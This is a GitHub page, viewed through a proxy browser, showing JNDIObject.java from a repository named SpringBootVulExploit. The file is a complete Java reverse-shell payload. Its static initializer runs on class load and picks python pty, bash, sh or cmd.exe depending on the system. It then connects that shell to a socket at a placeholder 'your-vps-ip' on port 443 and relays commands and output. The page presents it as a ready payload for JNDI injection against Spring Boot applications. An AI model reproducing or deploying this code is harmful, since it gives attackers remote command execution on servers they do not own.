FazBrowse GitHub Viewer
|
Trending
|
URL:
|
Home
Tools:
[Download Repo ZIP]
[View Raw Code]
[Original HTTPS Page]
SpringBootVulExploit/codebase/JNDIObject.java at master · sofunc/SpringBootVulExploit · GitHub
sofunc
SpringBootVulExploit
Repository navigation
Code
Pull requests
Actions
Projects
Security and quality
Insights
Expand file tree
Breadcrumbs
SpringBootVulExploit
/
codebase
/
JNDIObject.java
Copy path
More file actions
More file actions
Latest commit
History
History
History
76 lines (74 loc) · 2.64 KB
Breadcrumbs
SpringBootVulExploit
/
codebase
/
JNDIObject.java
Copy path
File metadata and controls
76 lines (74 loc) · 2.64 KB
Raw
Copy raw file
Download raw file
Open symbols panel
Edit and raw actions
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
/**
* javac -source 1.5 -target 1.5 JNDIObject.java
*
* Build By LandGrey
* */
import
java
.
io
.
File
;
import
java
.
io
.
InputStream
;
import
java
.
io
.
OutputStream
;
import
java
.
net
.
Socket
;
public
class
JNDIObject
{
static
{
try
{
String
ip
=
"your-vps-ip"
;
String
port
=
"443"
;
String
py_path
=
null
;
String
[]
cmd
;
if
(!
System
.
getProperty
(
"os.name"
).
toLowerCase
().
contains
(
"windows"
)) {
String
[]
py_envs
=
new
String
[]{
"/bin/python"
,
"/bin/python3"
,
"/usr/bin/python"
,
"/usr/bin/python3"
,
"/usr/local/bin/python"
,
"/usr/local/bin/python3"
};
for
(
int
i
=
0
;
i
<
py_envs
.
length
; ++
i
) {
String
py
=
py_envs
[
i
];
if
((
new
File
(
py
)).
exists
()) {
py_path
=
py
;
break
;
}
}
if
(
py_path
!=
null
) {
if
((
new
File
(
"/bin/bash"
)).
exists
()) {
cmd
=
new
String
[]{
py_path
,
"-c"
,
"import pty;pty.spawn(
\"
/bin/bash
\"
)"
};
}
else
{
cmd
=
new
String
[]{
py_path
,
"-c"
,
"import pty;pty.spawn(
\"
/bin/sh
\"
)"
};
}
}
else
{
if
((
new
File
(
"/bin/bash"
)).
exists
()) {
cmd
=
new
String
[]{
"/bin/bash"
};
}
else
{
cmd
=
new
String
[]{
"/bin/sh"
};
}
}
}
else
{
cmd
=
new
String
[]{
"cmd.exe"
};
}
Process
p
= (
new
ProcessBuilder
(
cmd
)).
redirectErrorStream
(
true
).
start
();
Socket
s
=
new
Socket
(
ip
,
Integer
.
parseInt
(
port
));
InputStream
pi
=
p
.
getInputStream
();
InputStream
pe
=
p
.
getErrorStream
();
InputStream
si
=
s
.
getInputStream
();
OutputStream
po
=
p
.
getOutputStream
();
OutputStream
so
=
s
.
getOutputStream
();
while
(!
s
.
isClosed
()) {
while
(
pi
.
available
() >
0
) {
so
.
write
(
pi
.
read
());
}
while
(
pe
.
available
() >
0
) {
so
.
write
(
pe
.
read
());
}
while
(
si
.
available
() >
0
) {
po
.
write
(
si
.
read
());
}
so
.
flush
();
po
.
flush
();
Thread
.
sleep
(
50L
);
try
{
p
.
exitValue
();
break
;
}
catch
(
Exception
e
) {
}
}
p
.
destroy
();
s
.
close
();
}
catch
(
Throwable
e
){
e
.
printStackTrace
();
}
}
}
Back
|
FazBrowse Home
|
New Git URL